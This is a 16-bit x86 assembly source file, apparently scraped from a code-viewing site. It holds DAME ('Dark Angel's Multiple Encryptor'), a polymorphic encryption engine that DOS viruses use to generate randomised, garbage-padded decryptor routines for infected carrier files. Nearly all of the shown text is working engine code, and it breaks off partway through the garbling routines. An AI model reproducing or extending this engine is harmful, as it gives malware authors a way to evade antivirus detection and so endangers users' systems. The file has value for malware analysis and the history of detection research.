📄 dame090.asm
字号:
ifndef vars
vars = 2
endif
if vars eq 1
else
_ax = 0
_cx = 1
_dx = 2
_bx = 3
_sp = 4
_bp = 5
_si = 6
_di = 7
_es = 8
_cs = 9
_ss = 0a
_ds = 0bh
MAXNEST = 0a ; controls recursion problems
; ax = flags
; 15 : Reserved
; 14 : 0 = word, 1 = dword
; 13 : encryption direction : 0 = forwards, 1 = backwards
; 12 : counter direction : 0 = forwards, 1 = backwards
; 11 : ^
; 10 : R
; 9 : E
; 8 : S
; 7 : E
; 6 : R
; 5 : V
; 4 : E
; 3 : D
; 2 : v
; DAME sets the above bits
;
; Virus sets the following bits:
; 1 : garble : 1 = yes, 0 = no
; 0 : DS = CS : 1 = yes, 0 = no
; bx = start decrypt in carrier file
; cx = encrypt length
; dx = start encrypt
; si = buffer to put decryption routine
; di = buffer to put encryption routine
; ds = current cs
; es = current cs
; Returns:
; cx = decryption routine length
; all other registers are preserved.
rnd_init_seed:
push dx
push cx
push bx
mov ah,2C ; get time
int 21
in al,40 ; port 40h, 8253 timer 0 clock
mov ah,al
in al,40 ; port 40h, 8253 timer 0 clock
xor ax,cx
xor dx,ax
jmp short rnd_get_loop_done
get_rand:
push dx
push cx
push bx
in al,40 ; get from timer 0 clock
db 5 ; add ax, xxxx
rnd_get_patch1 dw 0
db 0BA ; mov dx, xxxx
rnd_get_patch2 dw 0
mov cx,7
rnd_get_loop:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_get_loop_loc
inc al
rnd_get_loop_loc:
loop rnd_get_loop
rnd_get_loop_done:
mov rnd_get_patch1,ax
mov rnd_get_patch2,dx
mov al,dl
pop bx
pop cx
pop dx
retn
reg_xlat_table:
db 10000111b ; bx
db 0 ; sp
db 10000110b ; bp
db 10000100b ; si
db 10000101b ; di
aligntable db 3,7,0f,1f
redo_dame:
pop di
pop si
pop dx
pop cx
pop bx
pop ax
dame: ; Dark Angel's Multiple Encryptor
cld
push ax
push bx
push cx
push dx
push si
push di
call _dame
pop di
pop si
pop dx
pop bx ; return value in cx
pop bx
pop ax
ret
_dame:
; set up variables
cld
push ax
mov ax,offset _encryptpointer
xchg ax,di ; pointer to encryption routine buffer
stosw
xchg si,ax ; pointer to decryption routine buffer
stosw
stosw
xchg ax,dx ; starting offset of encryption
stosw
xchg ax,bx ; starting offset of decryption routine
stosw
xchg cx,dx ; dx = encrypt size
call clear_used_regs
mov cx,(endclear1 - beginclear1) / 2
rep stosw
call get_rand
and ax,not 3
pop cx
xor cx,ax ; cx = bitmask
call get_rand_bx
and bx,3
mov al,byte ptr [bx+aligntable]
cbw
add dx,ax ; round up
not ax
and dx,ax
mov ax,dx ; new encryption length
stosw ; _encrypt_length
shr ax,1
test ch,40 ; dword?
jz word_encryption
shr ax,1
word_encryption:
test ch,10
jnz counter_backwards
neg ax
counter_backwards:
stosw ; _counter_value
xchg ax,dx ; get encryption length in bytes
test ch,20
jnz encrypt_forwards
neg ax ; pointer to start of decryption
encrypt_forwards:
stosw ; _pointer_value
call get_rand
stosw ; encryption value = _decrypt_value
mov ax,8484
stosb
push di
stosw
stosb
pop di
call one_in_two
js s1
call get_another
stosb
call get_rand
mov _pointer_value,ax
dec di
s1:
inc di
jmp short gbxoh_skip
get_bx_or_higher:
call clear_reg
gbxoh_skip:
call get_another
cmp al,_bx
jb get_bx_or_higher
stosb ; _pointer_reg
call one_in_two
js s2
call get_another
stosb ; _encrypt_reg
s2:
; encode setup part of decryption
call clear_used_regs
encode_setup:
mov di,_decryptpointer
call twogarble
mov si,offset _dummy_reg
push si
encode_setup_get_another:
call get_rand_bx
and bx,3
mov al,[si+bx]
cbw
test al,80
jnz encode_setup_get_another
or byte ptr [bx+_dummy_reg],80
mov si,ax
inc byte ptr [si+offset _used_regs]
add bx,bx
mov dx,word ptr [bx+_counter_value-2]
mov _nest,0
call mov_reg_xxxx
call twogarble
call swap_decrypt_encrypt
push cx
and cl,not 3
call _mov_reg_xxxx
pop cx
mov _encryptpointer,di
pop si
mov dx,4
encode_setup_check_if_done:
lodsb
test al,80
jz encode_setup
dec dx
jnz encode_setup_check_if_done
mov si,offset _encryptpointer
mov di,offset _loopstartencrypt
movsw
movsw
; encode decryption part of loop
mov _relocate_amt,0
call do_encrypt1
test ch,40
jz dont_encrypt2
mov _relocate_amt,2
call do_encrypt1
dont_encrypt2:
mov bx,offset _loopstartencrypt
push cx
and cl,not 3
call encodejmp
pop cx
mov ax,0c3fc ; cld, ret
stosw
mov si,offset _encrypt_relocator
mov di,_start_encrypt
push cx
call relocate
pop cx
mov bx,offset _loopstartdecrypt
call encodejmp
call fourgarble
mov _decryptpointer,di
mov si,offset _decrypt_relocator
sub di,_decryptpointer2
add di,_start_decrypt
relocate:
test ch,20
jz do_encrypt_backwards
add di,_encrypt_length
do_encrypt_backwards:
sub di,_pointer_value
mov cx,word ptr [si-2]
jcxz exit_relocate
xchg ax,di
relocate_loop:
xchg ax,di
lodsw
xchg ax,di
add [di],ax
loop relocate_loop
exit_relocate:
mov di,_decryptpointer
mov cx,di
sub cx,_decryptpointer2
ret
do_encrypt1:
call playencrypt
call encryption
call playencrypt
ret
encodejmp:
mov di,word ptr [bx+_encryptpointer-_loopstartencrypt]
push bx
mov _nest,0
mov al,_pointer_reg
and ax,7
mov dx,2
test ch,40
jz update_pointer1
shl dx,1
update_pointer1:
test ch,20
jz update_pointer2
neg dx
update_pointer2:
call add_reg_xxxx
mov dl,75 ; jnz
mov al,_counter_reg
and ax,7
cmp al,_sp
jz do_jnz
push dx
mov dx,1
test ch,10 ; check counter direction
jz go_counter_forwards
cmp al,_cx
jnz regular
call one_in_two
js regular
pop dx
call get_rand_bx
xchg bx,dx
and dl,2
or dl,0e0 ; loop/loopnz
jmp short do_jnz
regular:
neg dx
go_counter_forwards:
call add_reg_xxxx
pop dx
do_jnz:
pop bx
mov ax,[bx]
sub ax,di
dec ax
dec ax
xchg ah,al
mov al,dl ; jnz
test ah,80
jnz jmplocation_okay
pop ax
pop ax
jmp redo_dame
jmplocation_okay:
stosw
mov word ptr [bx+_encryptpointer-_loopstartencrypt],di
ret
swap_decrypt_encrypt:
mov _nest,MAXNEST
mov _decryptpointer,di
mov di,_encryptpointer
ret
playencrypt:
mov di,_decryptpointer
call twogarble
mov al,_encrypt_reg
and ax,7
cmp al,4 ; is there an encryption register?
jz swap_decrypt_encrypt
call get_rand_bx ; 3/4 chance of doing something
cmp bl,0c0
ja swap_decrypt_encrypt
call _playencrypt
call handle_jmp_table_nogarble
finish_encryption:
call swap_decrypt_encrypt
push cx
and cl,not 3
call [bx+si+1]
pop cx
mov _encryptpointer,di
ret
_playencrypt:
mov _nest,0
call one_in_two
js get_used_register
call get_rand_bx
mov si,offset oneregtable
jmp short continue_playencrypt
get_used_register:
call get_rand_bx
and bx,7
cmp bl,_sp
jz get_used_register
cmp byte ptr [bx+_used_regs],0
jz get_used_register
mov si,offset tworegtable
continue_playencrypt:
xchg dx,bx
ret
encryption:
mov di,_decryptpointer
call twogarble
mov al,_pointer_reg
and ax,7
mov bx,offset reg_xlat_table-3
xlat
mov bp,offset _decrypt_relocate_num
call _playencrypt
call go_next
call handle_jmp_table_nogarble
mov bp,offset _encrypt_relocate_num
call go_next
jmp short finish_encryption
go_next:
push ax
lodsb
cbw
add si,ax
pop ax
inc si
inc si
ret
clear_used_regs:
xor ax,ax
mov di,offset _used_regs
stosw
stosw
inc ax
stosw
dec ax
stosw
ret
get_another:
call get_rand
and ax,7
mov si,ax
cmp [si+_used_regs],0
jnz get_another
inc [si+_used_regs]
ret
clear_reg_dx:
xchg ax,dx
clear_reg:
mov si,ax
mov byte ptr [si+_used_regs],0
ret
free_regs: ; check for free registers
; zero flag if OK
push ax
push cx
push di
mov di,offset _used_regs
mov cx,8
xor ax,ax
repne scasb
pop di
pop cx
pop ax
ret
one_in_two:
push ax
call get_rand
or ax,ax
pop ax
ret
get_rand_bx:
xchg ax,bx
call get_rand
xchg ax,bx
return:
ret
fourgarble:
call twogarble
twogarble:
mov _nest,0
call garble
garble: ; ax, dx preserved
call free_regs
jne return
test cl,2
jz return
push ax
push dx
call get_rand ; random # to dx
xchg ax,dx
call get_another ; random reg in al
call clear_reg ; don't mark as used
mov si,offset garbletable
jmp short handle_jmp_table_nopush_ax_dx
handle_jmp_table: ; ax,dx preserved
push si
call garble
pop si
handle_jmp_table_nogarble:
push ax
push dx
handle_jmp_table_nopush_ax_dx:
push si
push cx
xchg ax,cx
lodsb ; get mask value
cbw
xchg ax,cx
call get_rand_bx
and bx,cx
pop cx
inc _nest
cmp _nest,MAXNEST
jb not_max_nest
xor bx,bx
not_max_nest:
push bx
call [bx+si]
pop bx
pop si
pop dx
pop ax
ret
garble_tworeg:
mov si,offset tworegtable
and dx,7
jmp short handle_jmp_table_nogarble
garble_onereg:
mov si,offset oneregtable
jmp short handle_jmp_table_nogarble
garble_onebyte:
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -